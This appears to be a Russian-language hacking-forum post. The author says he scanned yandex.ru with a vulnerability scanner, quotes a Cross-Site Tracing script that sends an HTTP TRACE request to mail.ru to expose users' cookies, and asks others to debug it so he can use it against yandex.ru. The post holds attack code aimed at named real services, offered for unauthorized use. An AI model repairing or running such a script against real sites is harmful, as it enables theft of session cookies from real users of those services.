daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
недавно я просканил яндекс.ру Xspider`ом и увидел вот что: возможен метод Trace можно выполнить межсайтинговый скриптинг". я нашел про это статью у нас на сайте:http://www.xakep.ru/post/17540/default.asp. Там был следующий код скрипта, который выведет в всплывающем сообщении куки пользователя: <script> function xssDomainTraceRequest(){ var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP'); var exampleCode = xmlHttp; xmlHttp.open ("TRACE","http://mail.ru",false); xmlHttp.send (); xmlDoc=xmlHttp.responseText; alert (xmlDoc); var target = "http://mail.ru"; cExampleCode = encodeURIComponent(exampleCode + ';top.close()'); var readyCode = 'font-size: expression(execScript(decodeURIComponent("' + cExampleCode + '")))'; showModalDialog(target, null, readyCode); } </script> <INPUT TYPE="BUTTON" OnClick="xssDomainTraceRequest()" VALUE="Show Cookie Information Using TRACE"> он не работает….я заменил mail.ru на yandex.ru но всё равно не работает…кажется ошибка в синтаксисе - посмотрите плиз. очень бы хотелось скрипт доработать и в дело пустить:D
|